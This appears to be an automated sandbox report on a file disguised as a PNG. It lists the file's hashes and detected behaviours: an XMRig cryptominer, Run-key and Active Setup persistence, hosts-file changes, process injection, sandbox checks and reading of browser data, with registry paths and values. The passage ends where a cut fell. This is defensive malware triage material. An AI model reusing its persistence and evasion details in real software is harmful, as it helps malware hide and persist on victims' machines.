Analysis
-
max time kernel
1030s -
max time network
1029s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 14:00
Static task
static1
General
-
Target
Nimetön2.png
-
Size
347KB
-
MD5
2fa54d664fb48fe023800428f45a4268
-
SHA1
402422ace7b6a60704f72c066d78e90acc959ad3
-
SHA256
610f737ba4ff5008d058c6bea0d5985513ebc605666ae5aef828649c322c48d3
-
SHA512
ed3d6ea70f205adf4d6a6a5bbc25e06c93c11cc1361c476e9a1c0121385397dd8c01fc1b8970094bce13349e62d290e2fb976f9b26ba954be5a429dbb54f4695
-
SSDEEP
6144:gPHI2gyS3g4PLnecNupEQFE4Kt0oTBnxOhx58ongQ7u2XvIh1LvatmoYR:RV3HPVNuyKKt0WBxNWgQ7PQb2tcR
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral1/memory/4028-2916-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4028-2915-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4028-2922-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4028-2920-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4028-2921-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4028-2919-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4028-2918-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4028-2958-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4028-2959-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
Blocklisted process makes network request 6 IoCs
flow pid Process 152 2684 powershell.exe 154 2684 powershell.exe 156 2684 powershell.exe 159 2684 powershell.exe 170 1700 powershell.exe 171 1700 powershell.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\131.0.2903.70\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} setup.exe -
pid Process 2684 powershell.exe 5136 powershell.exe 1700 powershell.exe 5732 powershell.exe 5564 powershell.exe -
Contacts a large (520) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts InstallKMS.exe File created C:\Windows\system32\drivers\etc\hosts NameserverUpdate.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" MicrosoftEdgeUpdate.exe -
A potential corporate email address has been identified in the URL: [email protected]
-
A potential corporate email address has been identified in the URL: web-vitals@3
-
A potential corporate email address has been identified in the URL: [email protected]
-
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation SWUpdater.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedgewebview2.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation PcAppStore.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Wave Browser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedgewebview2.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedgewebview2.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedgewebview2.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation fast!.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation nw.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation nw.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wavebrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation msedge.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 64 IoCs
pid Process 5280 SpotifyFullSetup.exe 2064 Spotify.exe 3816 Spotify.exe 5596 Spotify.exe 4456 Setup.exe 2496 nsi77EE.tmp 4612 PcAppStore.exe 5324 Watchdog.exe 5400 MicrosoftEdgeWebview2Setup.exe 5616 MicrosoftEdgeUpdate.exe 4136 MicrosoftEdgeUpdate.exe 4552 MicrosoftEdgeUpdate.exe 696 MicrosoftEdgeUpdateComRegisterShell64.exe 4912 MicrosoftEdgeUpdateComRegisterShell64.exe 4112 MicrosoftEdgeUpdateComRegisterShell64.exe 2868 MicrosoftEdgeUpdate.exe 3724 MicrosoftEdgeUpdate.exe 5788 MicrosoftEdgeUpdate.exe 6028 MicrosoftEdgeUpdate.exe 4784 MicrosoftEdge_X64_131.0.2903.70.exe 5080 setup.exe 3480 setup.exe 4724 msedgewebview2.exe 2236 msedgewebview2.exe 5688 msedgewebview2.exe 1788 msedgewebview2.exe 4868 msedgewebview2.exe 1328 msedgewebview2.exe 6584 msedgewebview2.exe 6704 msedgewebview2.exe 5984 msedgewebview2.exe 2988 SetupEngine.exe 5508 NameserverUpdate.exe 4608 msedgewebview2.exe 7148 SetupEngine.exe 6612 MicrosoftEdgeUpdate.exe 3596 msedgewebview2.exe 2172 msedgewebview2.exe 348 msedgewebview2.exe 5564 diskspd.exe 396 msedgewebview2.exe 5420 msedgewebview2.exe 6588 msedgewebview2.exe 1220 msedgewebview2.exe 7008 msedgewebview2.exe 4608 msedgewebview2.exe 5912 FastSRV.exe 5580 fast!.exe 112 Fast!.exe 5420 nw.exe 5940 nw.exe 468 nw.exe 1352 nw.exe 6420 nw.exe 1108 nw.exe 6136 nw.exe 5016 nw.exe 1988 msedgewebview2.exe 4188 nw.exe 2592 nw.exe 8052 OperaSetup.exe 7948 setup.exe 3552 setup.exe 4744 setup.exe -
Loads dropped DLL 64 IoCs
pid Process 3816 Spotify.exe 5596 Spotify.exe 4456 Setup.exe 4456 Setup.exe 4456 Setup.exe 4456 Setup.exe 4456 Setup.exe 4456 Setup.exe 4456 Setup.exe 4456 Setup.exe 4456 Setup.exe 4456 Setup.exe 4456 Setup.exe 2496 nsi77EE.tmp 2496 nsi77EE.tmp 2496 nsi77EE.tmp 2496 nsi77EE.tmp 2496 nsi77EE.tmp 2496 nsi77EE.tmp 2496 nsi77EE.tmp 2496 nsi77EE.tmp 2496 nsi77EE.tmp 2496 nsi77EE.tmp 5616 MicrosoftEdgeUpdate.exe 4136 MicrosoftEdgeUpdate.exe 4552 MicrosoftEdgeUpdate.exe 696 MicrosoftEdgeUpdateComRegisterShell64.exe 4552 MicrosoftEdgeUpdate.exe 4912 MicrosoftEdgeUpdateComRegisterShell64.exe 4552 MicrosoftEdgeUpdate.exe 4112 MicrosoftEdgeUpdateComRegisterShell64.exe 4552 MicrosoftEdgeUpdate.exe 2868 MicrosoftEdgeUpdate.exe 3724 MicrosoftEdgeUpdate.exe 5788 MicrosoftEdgeUpdate.exe 5788 MicrosoftEdgeUpdate.exe 3724 MicrosoftEdgeUpdate.exe 6028 MicrosoftEdgeUpdate.exe 4612 PcAppStore.exe 4724 msedgewebview2.exe 2236 msedgewebview2.exe 4724 msedgewebview2.exe 4724 msedgewebview2.exe 4724 msedgewebview2.exe 1788 msedgewebview2.exe 5688 msedgewebview2.exe 1788 msedgewebview2.exe 4868 msedgewebview2.exe 4868 msedgewebview2.exe 1328 msedgewebview2.exe 5688 msedgewebview2.exe 1328 msedgewebview2.exe 1328 msedgewebview2.exe 5688 msedgewebview2.exe 5688 msedgewebview2.exe 5688 msedgewebview2.exe 5688 msedgewebview2.exe 6584 msedgewebview2.exe 6704 msedgewebview2.exe 6704 msedgewebview2.exe 6704 msedgewebview2.exe 6584 msedgewebview2.exe 6584 msedgewebview2.exe 5984 msedgewebview2.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCAppStore = "\"C:\\Users\\Admin\\PCAppStore\\PcAppStore.exe\" /init default" PcAppStore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCAppStoreUpdater = "\"C:\\Users\\Admin\\PCAppStore\\AutoUpdater.exe\" /i" PcAppStore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wavesor SWUpdater = "\"C:\\Users\\Admin\\Wavesor Software\\SWUpdater\\1.3.135.0\\SWUpdaterCore.exe\"" SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCAppStore = "\"C:\\Users\\Admin\\PCAppStore\\PCAppStore.exe\" /init default" nsi77EE.tmp Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PcAppStoreUpdater = "\"C:\\Users\\Admin\\PCAppStore\\AutoUpdater.exe\" /i" nsi77EE.tmp Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Watchdog = "\"C:\\Users\\Admin\\PCAppStore\\Watchdog.exe\" /guid=4FC725D8-4F7D-4884-B878-08BB0CE6C800X /rid=20241204140523.755240879578 /ver=fa.2001g" nsi77EE.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWUpdater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PcAppStore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA msedge.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: fast!.exe File opened (read-only) \??\N: fast!.exe File opened (read-only) \??\W: fast!.exe File opened (read-only) \??\X: fast!.exe File opened (read-only) \??\Y: fast!.exe File opened (read-only) \??\P: fast!.exe File opened (read-only) \??\T: fast!.exe File opened (read-only) \??\D: setup.exe File opened (read-only) \??\A: fast!.exe File opened (read-only) \??\M: fast!.exe File opened (read-only) \??\Q: fast!.exe File opened (read-only) \??\S: fast!.exe File opened (read-only) \??\V: fast!.exe File opened (read-only) \??\F: setup.exe File opened (read-only) \??\Z: fast!.exe File opened (read-only) \??\D: setup.exe File opened (read-only) \??\E: fast!.exe File opened (read-only) \??\G: fast!.exe File opened (read-only) \??\J: fast!.exe File opened (read-only) \??\K: fast!.exe File opened (read-only) \??\L: fast!.exe File opened (read-only) \??\R: fast!.exe File opened (read-only) \??\U: fast!.exe File opened (read-only) \??\H: fast!.exe File opened (read-only) \??\I: fast!.exe File opened (read-only) \??\O: fast!.exe File opened (read-only) \??\F: setup.exe -
Installs/modifies Browser Helper Object 2 TTPs 8 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 2105 camo.githubusercontent.com 2106 camo.githubusercontent.com 151 raw.githubusercontent.com 152 raw.githubusercontent.com 361 href.li 362 href.li 363 href.li -
Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
flow ioc 1036 https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3716 powercfg.exe 5604 powercfg.exe 4436 powercfg.exe 6928 powercfg.exe 2904 powercfg.exe 6672 powercfg.exe 2312 powercfg.exe 6984 powercfg.exe -
Checks system information in the registry 2 TTPs 26 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName msedgewebview2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName nw.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer msedgewebview2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer wavebrowser.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName wavebrowser.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer nw.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer msedge.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe InstallKMS.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe NameserverUpdate.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk setup.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5508 set thread context of 5000 5508 NameserverUpdate.exe 369 PID 5508 set thread context of 4028 5508 NameserverUpdate.exe 370 -
resource yara_rule behavioral1/memory/4028-2911-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2910-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2916-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2915-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2913-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2922-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2920-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2921-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2919-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2918-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2914-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2912-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2958-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4028-2959-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Trust Protection Lists\Mu\Advertising setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\new_delegatedWebFeatures.sccd setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_775367181\crl-set msedge.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Locales\bn-IN.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Locales\de.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Locales\kn.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Locales\ug.pak setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_875330787\vendor.bundle.js.LICENSE.txt msedge.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Locales\kk.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\learning_tools.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\mspdf.dll setup.exe File created C:\Program Files (x86)\Fast!\nwjs\nw.dll SetupEngine.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_875330787\Wallet-Checkout\app-setup.js msedge.exe File 